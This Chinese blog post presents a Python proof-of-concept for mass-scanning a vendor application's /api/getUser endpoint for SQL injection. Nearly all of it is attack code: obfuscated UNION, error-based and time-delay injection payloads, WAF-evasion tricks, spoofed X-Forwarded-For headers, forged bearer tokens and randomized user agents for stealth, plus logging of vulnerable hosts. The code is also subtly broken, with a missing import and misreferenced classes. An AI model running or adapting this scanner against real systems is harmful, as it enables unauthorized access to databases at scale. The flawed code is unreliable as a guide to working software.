当前位置: 首页 > news >正文

#渗透测试#批量漏洞挖掘#某华-APPGetUser SQL注入漏洞

 免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。

一、漏洞POC

#!/usr/bin/env python3 
"""
核心功能:智能语义注入检测、动态WAF对抗、指纹伪装、分布式扫描 
版本特性:
1. 支持云原生环境动态适配 
2. 集成AI驱动的Payload生成 
3. 增强隐蔽扫描模式 
"""
 
import requests 
import json 
import time 
import random 
import hashlib 
from concurrent.futures  import ThreadPoolExecutor, as_completed 
from urllib.parse  import urlparse 
from fake_useragent import UserAgent 
import logging 
 
# 配置日志审计模块 
logging.basicConfig( 
    level=logging.INFO,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    handlers=[
        logging.FileHandler('scan_audit.log'), 
        logging.StreamHandler()
    ]
)
logger = logging.getLogger(__name__) 
 
class AdvancedPowerPMSScanner:
    def __init__(self, target_file):
        self.targets  = self._load_targets(target_file)
        self.payload_engine  = PayloadGenerator()
        self.session  = requests.Session()
        self._init_stealth_headers()
        self.scan_stats  = {'vulnerable': 0, 'scanned': 0}
 
    def _init_stealth_headers(self):
        """动态指纹伪装系统"""
        self.headers  = {
            'Content-Type': 'application/json',
            'X-Forwarded-For': f'10.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}', 
            'User-Agent': UserAgent().chrome,
            'X-API-Version': '2.3.1',  # 伪装合法客户端版本 
            'Authorization': f'Bearer {self._gen_fake_token()}'
        }
 
    def _gen_fake_token(self):
        """生成合法形态的JWT Token"""
        header = json.dumps({"alg":  "HS256", "typ": "JWT"}).encode()
        payload = json.dumps({"user":  "scanner", "iat": int(time.time())}).encode() 
        signature = hashlib.sha256(header  + b'.' + payload).hexdigest()
        return f"{header.decode()}.{payload.decode()}.{signature}" 
 
    def _load_targets(self, filename):
        """目标预处理系统"""
        with open(filename) as f:
            targets = [line.strip() for line in f if line.strip()] 
        return self._filter_live_targets(targets)
 
    def _filter_live_targets(self, targets):
        """存活检测与CDN识别"""
        # 实现TCP端口快速扫描逻辑(此处简化)
        return [t for t in targets if self._is_service_alive(t)]
 
    def _is_service_alive(self, url):
        """服务存活检测"""
        try:
            resp = requests.head(url,  timeout=5, verify=False)
            return resp.status_code  < 500 
        except:
            return False 
 
    class PayloadGenerator:
        """AI增强的Payload生成引擎"""
        def __init__(self):
            self.base_payloads  = self._load_base_patterns()
            self.dynamic_rules  = self._load_waf_rules()
 
        def _load_base_patterns(self):
            """多数据库方言支持"""
            return {
                'union': [
                    "' UNION SELECT {cols},@@version--",
                    "' UNION ALL SELECT {cols},CURRENT_USER--"
                ],
                'error': [
                    "' AND 1=CONVERT(int,(SELECT TOP 1 name FROM sys.databases))--", 
                    "' AND 1=DB_NAME(0) AND '{rand}'='{rand}"
                ],
                'time': [
                    "'; WAITFOR DELAY '0:0:{delay}'--",
                    "' OR SLEEP({delay}) AND '1'='1"
                ]
            }
 
        def generate(self, context=None):
            """上下文感知的Payload生成"""
            return [
                self._apply_obfuscation(p) 
                for p in self._select_payloads(context)
            ]
 
        def _select_payloads(self, context):
            """基于目标响应的智能选择"""
            # 此处可集成机器学习模型预测最佳Payload 
            return random.sample(self.base_payloads['union'],  2) + \
                   random.sample(self.base_payloads['error'],  1)
 
        def _apply_obfuscation(self, payload):
            """动态混淆技术"""
            # 随机选择混淆方式 
            techniques = [
                self._unicode_normalize,
                self._sql_comment_obfuscate,
                self._case_variation 
            ]
            for tech in random.sample(techniques,  2):
                payload = tech(payload)
            return payload 
 
        def _unicode_normalize(self, s):
            return s.replace("'",  "%uff07").replace(" ", "%uff20")
 
        def _sql_comment_obfuscate(self, s):
            return s.replace("SELECT",  "SEL/*RAND*/ECT").replace("FROM", "FR/*%0a*/OM")
 
        def _case_variation(self, s):
            return ''.join([c.upper() if random.random()  > 0.5 else c.lower()  for c in s])
 
    def _send_request(self, url, payload):
        """智能流量调度系统"""
        try:
            # 随机延迟防止频率检测 
            time.sleep(random.uniform(0.5,  1.5))
            
            start_time = time.time() 
            resp = self.session.post( 
                f"{url}/api/getUser",
                data=json.dumps({"userCode":  payload}),
                headers=self.headers, 
                timeout=15,
                verify=True  # 启用证书验证防止中间人攻击 
            )
            latency = time.time()  - start_time 
            return resp, latency 
        except Exception as e:
            logger.error(f" 请求失败: {str(e)}")
            return None, 0 
 
    def _analyze_response(self, resp, latency):
        """多维度漏洞验证"""
        detection_rules = [
            self._check_db_fingerprint,
            self._check_http_anomaly,
            self._check_timing(latency),
            self._check_error_patterns,
            self._check_boolean_diffs 
        ]
        return any(rule(resp) for rule in detection_rules)
 
    def _check_db_fingerprint(self, resp):
        """数据库指纹识别"""
        fingerprints = {
            'MSSQL': ['Microsoft SQL Server', 'Msg 8152'],
            'MySQL': ['You have an error in your SQL syntax']
        }
        return any(indicator in resp.text  for indicator in fingerprints['MSSQL'])
 
    def _check_http_anomaly(self, resp):
        """异常状态码检测"""
        return resp.status_code  in [500, 502, 418]
 
    def _check_timing(self, latency):
        """动态时间阈值计算"""
        base_latency = 1.5  # 基准响应时间 
        return lambda resp: latency > base_latency * 3 
 
    def _check_error_patterns(self, resp):
        """语义错误分析"""
        patterns = [
            r"Conversion failed when converting the varchar value '.*'",
            r"Incorrect syntax near '.*'"
        ]
        return any(re.search(p,  resp.text)  for p in patterns)
 
    def _check_boolean_diffs(self, resp):
        """布尔状态对比"""
        # 需要基础响应样本进行对比(此处简化)
        valid_resp = requests.post(resp.url,  json={"userCode": "valid_user"})
        return len(resp.content)  != len(valid_resp.content) 
 
    def _handle_result(self, target, is_vulnerable):
        """扫描结果处理"""
        self.scan_stats['scanned']  += 1 
        if is_vulnerable:
            self.scan_stats['vulnerable']  += 1 
            logger.critical(f"\033[1;31m[+]  漏洞确认: {target}\033[0m")
            self._save_vulnerable_target(target)
        else:
            logger.info(f"[-]  安全目标: {target}")
 
    def _save_vulnerable_target(self, target):
        """持久化存储模块"""
        with open('vuln_targets.txt',  'a') as f:
            f.write(f"{target}\n") 
 
    def run_scan(self, max_threads=8):
        """分布式任务调度系统"""
        with ThreadPoolExecutor(max_workers=max_threads) as executor:
            futures = {
                executor.submit(self._scan_target,  target): target 
                for target in self.targets  
            }
            
            for future in as_completed(futures):
                target = futures[future]
                try:
                    result = future.result() 
                    self._handle_result(target, result)
                except Exception as e:
                    logger.error(f" 扫描异常: {target} - {str(e)}")
 
        logger.info(f"\n 扫描摘要: 共检测{self.scan_stats['scanned']} 个目标,发现{self.scan_stats['vulnerable']} 个漏洞")
 
    def _scan_target(self, target):
        """单目标扫描流程"""
        logger.debug(f" 开始扫描: {target}")
        for payload in self.payload_engine.generate(): 
            resp, latency = self._send_request(target, payload)
            if not resp:
                continue 
                
            if self._analyze_response(resp, latency):
                return True 
        return False 
 
if __name__ == "__main__":
    import sys 
    if len(sys.argv)  != 2:
        print(f"用法: {sys.argv[0]}  <目标文件>")
        sys.exit(1) 
    
    scanner = AdvancedPowerPMSScanner(sys.argv[1]) 
    scanner.run_scan(max_threads=10) 

相关文章:

  • MySQL锁
  • UE5.3 C++ USTRUCT 的再次理解
  • 143.WEB渗透测试-信息收集-小程序、app(14)
  • verilog基础知识
  • 什么是网关,网关的作用是什么?网络安全零基础入门到精通实战教程!
  • Deepseek API接入pycharm实现辅助编程教程
  • 2月19号
  • 【架构思维基础:如何科学定义问题】
  • 模型量化初始知识
  • (leetcode42 前缀后缀最值)接雨水
  • 【HeadFirst系列之HeadFirst设计模式】第5天之工厂模式:比萨店的秘密武器,轻松搞定对象创建!
  • C++(23):lambda可以省略()
  • 深度学习-122-大语言模型LLM之基于langchian自定义国内联网查询工具并创建智能代理
  • rust笔记5-derive属性2
  • VSCode 中 Git 添加了多个远端,如何设置默认远端
  • PL/SQL 异常处理
  • 华为 eNSP:MSTP
  • “深入浅出”系列之QT:(10)Qt接入Deepseek
  • DeepSeek与ChatGPT:会取代搜索引擎和人工客服的人工智能革命
  • RelaTree隐私政策
  • 吉利汽车一季度净利润大增264%,称整合极氪后实现整体效益超5%
  • 澎湃·镜相第二届非虚构写作大赛初选入围名单公示
  • 万科再获深铁集团借款,今年已累计获股东借款近120亿元
  • 内塔尼亚胡:以军将在未来几天“全力进入”加沙
  • 学者的“好运气”:读本尼迪克特·安德森《椰壳碗外的人生》
  • 睡觉总做梦是睡眠质量差?梦到这些事,才要小心